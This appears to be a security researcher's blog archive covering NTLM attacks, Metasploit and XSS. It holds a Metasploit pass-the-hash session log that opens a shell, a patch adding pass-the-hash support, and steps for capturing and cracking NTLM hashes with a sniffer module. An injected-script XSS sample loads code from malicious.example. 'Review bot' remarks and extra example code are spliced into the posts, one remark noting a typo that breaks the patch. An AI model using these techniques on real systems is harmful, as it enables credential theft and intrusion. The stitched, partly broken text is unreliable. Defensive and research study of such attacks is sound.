
Category Archives: security

John Heasman just posted a rocking method of obtaining NTLM hashes out of an enterprise by turning a Java applet into a web server! Check it out!

This year I’ll be presenting at DefCon on the history of NTLM attacks, how they work and why we need to get rid of it. I’ll release a tool that will combine as many hacks as I can get working to use captured users and their authentication tokens. There’s been a lot of talk in the past few years about browser security and it’s mostly hinged around using Javascript as a port scanner, sending attacks through the browser, attacking the platforms, etc. Few have been talking about an Enterprise-class risk and since that’s what I get paid to think about I’m gonna blow it open. 🙂 Come to DefCon and have a great time!

SyScan was great, a little small but helpful to bring the confidence up speaking to people who have no clue who I am! I learned quite a bit about my speaking style which helped firm up ideas about the DefCon presentation. I presented a combination of Web Security Mistakes including how to get a free MacWorld pass and spoke more about the future of PokeHashBall.

We stayed a few extra days to soak up the culture and soak the sweat into our clothes some more since this was our first trip to Hong Kong. The MongKok Computer Center was interesting but didn’t seem to really have the deals I was expecting. I didn’t get to any of the other computer centers however. Maybe next trip!

We went through Narita airport on the way back so I stopped at Duty Free and bought a bottle of Suntory Whiskey, the kind Bill Murray is hawking in the movie “Lost In Translation”. For relaxing times, make it Santory time. . .

Continuing the tradition of (NY|Chi|Bay|*)Sec groupings of infosec people without a vendor bent, announcing BERKSEC 0001 – just because, why not, it’s not in SF.

Come on by the Albatross Pub on Tuesday, Oct 30 at 7:30 or 8pm or later… Look for the long haired guy with a Toorcon t-shirt and join us.

Things got a little busy/crazy around here, so I’m not satisfied with what I have done so far and there’s no code yet. This past weekend was Toorcon 1001 and it was as enjoyable as ever. I had a few breakthrough ideas thanks to the talks and side chats with everybody. That’s mostly why I’m not satisfied — always room for improvement. 🙂

I promise to show something soon. Really.

Surprisingly Metasploit 3’s SMB auth routines didn’t support “pass the hash” so I took some time and put it in.

msf exploit(ms06_040_netapi) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(ms06_040_netapi) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(ms06_040_netapi) > exploit

[*] Started bind handler
[*] Doing pass the hash.
[*] LM: 6A98EB0FB88A449CBE6FABFD825BCA61
[*] NT: A4141712F19E9DD5ADF16919BB38A95C
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Command shell session 1 opened ( ->

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


The Patch:

Index: lib/rex/proto/smb/client.rb
— lib/rex/proto/smb/client.rb (revision 4889)
+++ lib/rex/proto/smb/client.rb (working copy)
@@ -568,8 +568,13 @@

raise XCEPT::NTLM1MissingChallenge if not self.challenge_key

– hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ”
– hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ”
+ if (pass.length == 65)
+ hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack(‘H42’), self.challenge_key)
+ hash_nt = CRPYT.e_p24( [ pass.upcase()[33,65] ].pack(‘H42’), self.challenge_key)
+ else
+ hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ”
+ hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ”
+ end

data = ”
data << hash_lm
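Review bot: `CRPYT.e_p24` on the new hash_nt line is a typo for `CRYPT`; as written the hash branch raises NameError on an uninitialized constant the first time SMBPass carries a hash pair, so pass the hash cannot work until it is fixed. Also add a comment on the `pack(‘H42’)` calls: e_p24 expects 21 bytes and the 32-character hex slice only yields 16, so the code is relying on Ruby zero-padding the pack output to the requested count; without that note the next reader will "correct" it to H32 and break the response. `pass.upcase()[33,65]` works, but `[33,32]` states the intent (the 32 hex digits after the colon).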
@@ -690,7 +695,11 @@
nonce = CRYPT.md5_hash(self.challenge_key + client_challenge)

# Generate the NTLM hash
– resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ if (pass.length == 65)
+ resp_ntlm = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack(‘H42’), nonce[0, 8])
+ else
+ resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ end

# Generate the fake LANMAN hash
resp_lmv2 = client_challenge + (“\x00” * 16)
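Review bot: `pass.length == 65` is copied from the first hunk and is a weak discriminator: any real 65-character password is hex-decoded as an LM:NT pair instead of being hashed, and the login fails with no hint why. Pull the test into one helper that checks `/^[0-9a-f]{32}:[0-9a-f]{32}$/i` and call it from both places so the two paths cannot drift. A one-line comment here would also help: in this NTLM2-session path only the NT half of SMBPass is used, and the LM half is deliberately replaced by client_challenge plus zero padding in the line below.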

In Metasploit 2.7 there existed a module called “smb_sniffer” that listened as a Windows SMB server, responded to negotiations with a preset challenge and forced crypto to NTLMv1. When I asked the devs about it they said it was for “future purposes.”

That future purpose is now documented!

Step 1 – Download my slightly updated version from here and place it in your exploits/ directory.

Step 2a – Run it with root privs on a UNIX host (doesn’t work on Windows, sorry).
Step 2b – Have a Windows machine connect to your “share” – they will get an access denied but stuff like will work.

Step 3 – Send the hashes to Cain & Abel for cracking or cryptanalysis! Obtain the HALFLMCHALL tables from FreeRainbowCrack.Com or run a brute force, dictionary, hybrid, etc.

Step 4 – Success!

One caveat — the half-LM challenge table only covers the first 7 characters of the LANMAN hash. You still have to brute force the last 7, and if the user’s password is longer than 14 characters, you’re really out of luck.
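As an added example (not code from the post or from Metasploit), a small Ruby audit over LM:NT hash pairs in the SMBPass format used above: it validates a pair by format rather than by its 65-character length, shows the 21-byte padding e_p24 needs, and classifies each account’s exposure to the half-LM table attack described in the caveat. The account names and every hash except the Administrator pair from the post are constructed.

```ruby
HASH_PAIR = /\A([0-9a-f]{32}):([0-9a-f]{32})\z/i

# An LM hash is two independent DES blocks, one per 7-character half of the
# upper-cased password. An empty half always encrypts to this well-known constant.
LM_EMPTY_HALF = 'AAD3B435B51404EE'
LM_EMPTY      = LM_EMPTY_HALF * 2 # the LM hash of the empty password: nothing usable

# Validate the SMBPass string by format, not by length: a real 65-character
# password would otherwise be mistaken for a hash pair.
def parse_hash_pair(str)
  m = HASH_PAIR.match(str.strip)
  raise ArgumentError, "expected LMHASH:NTHASH, got #{str.inspect}" unless m
  { lm: m[1].upcase, nt: m[2].upcase }
end

# e_p24 takes the 16-byte hash zero-padded to 21 bytes. The patch above gets the
# same bytes from pack('H42'): Ruby zero-pads when the hex string is shorter than the count.
def p21_from_hex(hex32)
  [hex32].pack('H32') + ("\x00" * 5).b
end

# :none  - no LM hash stored (password over 14 characters, or the NoLMHash policy
#          "Do not store LAN Manager hash value on next password change" is set)
# :short - second half empty, so the password is 7 characters or fewer and the
#          half-LM table recovers all of it
# :full  - two halves: the table yields the first 7 characters, the last 7 must
#          still be brute-forced (the caveat in the post)
def lm_exposure(lm_hex)
  lm = lm_hex.upcase
  return :none  if lm == LM_EMPTY
  return :short if lm[16, 16] == LM_EMPTY_HALF
  :full
end

# Map account name -> exposure class for a dump of LM:NT pairs.
def audit(accounts)
  accounts.each_with_object({}) do |(user, pair), report|
    report[user] = lm_exposure(parse_hash_pair(pair)[:lm])
  end
end

# Constructed sample; the Administrator pair is the one shown in the post.
SAMPLE_ACCOUNTS = {
  'Administrator' => '6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C',
  'helpdesk'      => '0011223344556677AAD3B435B51404EE:00112233445566778899AABBCCDDEEFF',
  'svc_backup'    => 'AAD3B435B51404EEAAD3B435B51404EE:FFEEDDCCBBAA99887766554433221100',
}
puts audit(SAMPLE_ACCOUNTS).inspect if $PROGRAM_NAME == __FILE__
```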

Enjoy! 🙂

I was reading a review of the Yoggie Gatekeeper Pro in this month’s SC Magazine. It’s a neat little device that hides your PC behind a Linux firewall-appliance when connecting to an untrusted network. The voodoo of how it shims itself into your Windows networking stack so you can connect to a wireless network and still be protected through the Yoggie aside — one thing about the review really made my hair bristle:

Using our vulnerability assessment tool (NetClarity) and our penetration tool (Core Impact) we were unable to compromise the Gatekeeper or the computer behind it.
– SC Magazine, April 2007, Pg 63

Well duh.

Both the tools listed are only as strong as their signatures, exploits and platform shellcode. That statement is like running Core Impact against a copy of OpenVMS and saying IMPENETRABLE! when you’re done. Technically it’s valid but it’s no measure of strength.

Maybe these statements are made because of a contractual obligation. “Say our product name five times and we’ll give you free copies” sort of thing. Unfortunately there will be InfoSec managers and the like who will listen and wonder if maybe they should use these tools in lieu of hiring security professionals who actually know something.

Maybe I’m just being too overly critical and hypersensitive about this. I don’t think I am, as I’ve looked at a number of Web Application Security tools on the market and none of them have been able to find the more serious vulnerabilities that a team of two or three highly skilled testers has. We still need good QA, but attack frameworks like CORE Impact, Canvas and Metasploit aren’t automated tools. Don’t treat them as such.

Security Opus rocked. Very laid back attitude (hey, it’s San Francisco). Free drinks every night – thanks Microsoft, Richard and other sponsors! Great speakers and talks. Networking with friends in a relaxing environment. We’ll do it again in September I think. BE THERE!

Some of the topics you missed that I liked (and can remember right now):

  • Stefano Zanero ranted about Intrusion Detection|Prevention Systems. Stuff many of us have been saying for a long time like “Real-time response is not really possible” but he had the math and pretty graphs to prove it to management. IDS isn’t dead but it’s never been a killer app in my opinion. It is still very important to have in any environment.
  • Cedric Blancher’s presentation on 802.11 security was insightful and I spoke with a few people who hadn’t yet heard about all of the attacks before.
  • Shawn Merdinger from VOIPSA showed a few of VoIP’s problems. He’s primarily focused on client/handset issues vs protocol weaknesses or server issues but his liquid-fueled talk was informative and put the spark back in me to finish setting up an Asterisk server. So many projects, so little time!
  • Matt Hargett and Luis Miras have very strong opinions on source code analysis for vulnerabilities. It’s a topic I’m looking into this year for work and understand it’s a very difficult problem with no real good answer.
  • Whoever named it “Web 2.0” should stop trying to name things. I’m tired of seeing crap about “Web 2.0”. Every time somebody says it in a presentation, God kills a puppy or kitten from a no-kill shelter.

There were other talks about cryptovirology, botnets, etc. Show your support and come in September. My favorite quote from Richard Thieme: “Foreclose on the antelope!”

Richard cracks me up sometimes, especially when he and Simple Nomad get to talking about UFOs and secret government projects (last year’s SecurityOpus).

In other news, some more projects, exploits and scripts will be uploaded sometime this week when I get around to cleaning them up. It’s been a busy week.

This week I wrote an exploit for a JRun vulnerability released in 2002! I was proud of myself as we rarely get the chance to write an overflow during a penetration test. Usually it’s all web exploits, unpatched windows systems, poor administration, etc. My friend said we found “the oldest box on his network.” So much for “no public exploits exist” as a mitigation! HA!

The hardest part of all this was getting a copy of the JRun software installed and running in a VM. It was so old the company (Allaire) had been bought twice so no installers could easily be found! A few hurdles later and within half a day I had a stable module written for Metasploit. Later in the evening I wrapped one up for Canvas. I don’t have a copy of CORE Impact – it’s a little expensive and, well, we do alright with what we have. 🙂

Dave Aitel once said he envisioned a future of exploit writing becoming a marketplace where they can be sold by third parties like ActiveX objects were in the early days of IE. Needed to do some video? Here’s a library that’ll help!

To be honest I don’t see that happening. There’s little value for me to spend some amount ($100 to $5000?) for a single exploit that may or may not work to “prove” the system is vulnerable. There’s so much wiggle area when exploiting a system, even with the protections provided by today’s frameworks, that it’ll just be too unreliable. I’d have a hard time justifying the cost but maybe that’s just me.

There’s been talk on the Metasploit mailing list of putting together an exploit module repository. Something centralized that can be maintained by developers. I’ve been searching for a project, maybe this will be it. 🙂 Anyone else that’s interested drop me a line. I envision a Trac Wiki + SVN repository with some core supporters and community submissions/requests. Of course we’ll have to weed out the 100s of “writemesumthin 2 hax myspace/yahoo/aim” but that’s part of the fun!

Until then.. enjoy my meager contributions:

SecurityOPUS is coming up March 19-21 here in San Francisco. It’s an awesome conference and I highly recommend coming — registration is still open. We don’t have many get-togethers here for some reason other than big marketing events like RSA. There’s a lot of talent in the bay area and this is a great way for the security community to come together more. Come! Learn! Enjoy! Eat some great food on Rich’s dime! Then later come to our OWASP meetings. They’re lots of fun and free beer when iSEC Partners hosts. 🙂

The security freaks at Watchfire recently released an amazing piece of research against Google Desktop. If you use this product it’s best to update it now.

PDF and an awesome Adobe Flash presentation are worth checking out.

Essentially through Cross-site Scripting and a Javascript command and control API they’ve shown the ability to fully compromise a device. All of it can be automated.

As a web user I’ve been afraid of client-side language interpreters for a long time. Javascript, ActiveX, Java, etc — they take too much control away from my PC and give it to web servers. Blogs, forums, malicious trojan servers, etc all can carry dangerous payloads that will run unnoticed to me because that’s how the user experience is.

This year is going to be fun. 🙂

This morning I awoke to find an urgent posting from Websense. Somebody had placed a bit of javascript on the Dolphin Stadium website @ Don’t worry, it’s not there anymore. This weekend is the Superbowl and a LOT of football fans could very well visit this site, and if they haven’t updated their Internet Explorer in a while they’d find a keylogger and backdoor installed on their PC.

A pretty big issue that was resolved fairly quickly by the host removing the offending source but our comfort level with that site is shaky now. How did the attackers get in, did they close the hole or just put some silly putty over it? We may never know.

The malicious code turns out to be a javascript file called 3.js loaded from a website named A very quick googledork search found something interesting:

The CDC’s podcast site! They’ve since brought down their system for repairs.

The site has been removed as well but how many people already had their machines trojaned?

This attack is called “Persistent Cross-Site Scripting (XSS)”, in that the malicious JavaScript code gets left behind on the web application, usually as a database entry that is displayed at some point during the user’s experience. When somebody goes to visit the website the malicious code is loaded and, in this particular case, bad things happen to the browser if it hasn’t been patched against two recent Microsoft bugs (MS06-014 and MS07-004).
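An added example, not from the post: the rendering pattern that makes persistent XSS possible, shown as the vulnerable renderer beside an output-encoded one, plus a check over served HTML for script tags that load from hosts other than the site’s own, which is the shape of the 3.js injection described above. The stored comment and the host malicious.example are constructed.

```ruby
require 'cgi'
require 'uri'

# Constructed database row: a comment left behind carrying a remote script loader.
STORED_COMMENT = 'Go Dolphins! <script src="http://malicious.example/3.js"></script>'

# Vulnerable: the stored entry is pasted into the page as markup, so every visitor's
# browser fetches and runs the remote script.
def render_vulnerable(comment)
  %(<div class="comment">#{comment}</div>)
end

# Hardened: entity-encode on output; the browser shows the tag as text and runs nothing.
def render_hardened(comment)
  %(<div class="comment">#{CGI.escapeHTML(comment)}</div>)
end

SCRIPT_SRC = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/i

# Detection side: list script sources on a served page whose host is not one of ours.
# Relative URLs (no host) count as first-party.
def foreign_scripts(html, own_hosts)
  html.scan(SCRIPT_SRC).flatten.reject do |src|
    host = (URI.parse(src).host rescue nil)
    host.nil? || own_hosts.include?(host.downcase)
  end
end
```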

There are a lot of XSS bugs out there. Michael Sutton did a massive check and reliably confirmed that out of 272 sites, 47 (17.3%) of them had an XSS vulnerability. The XSS Wall of Shame at the forum never stops, most of them being non-persistent.

Browsing the web with a JavaScript-enabled browser is just plain dangerous. It’s not just those ‘seedy’ underground sites you should avoid, it’s everywhere.

Some very good resources on XSS and its very real threats: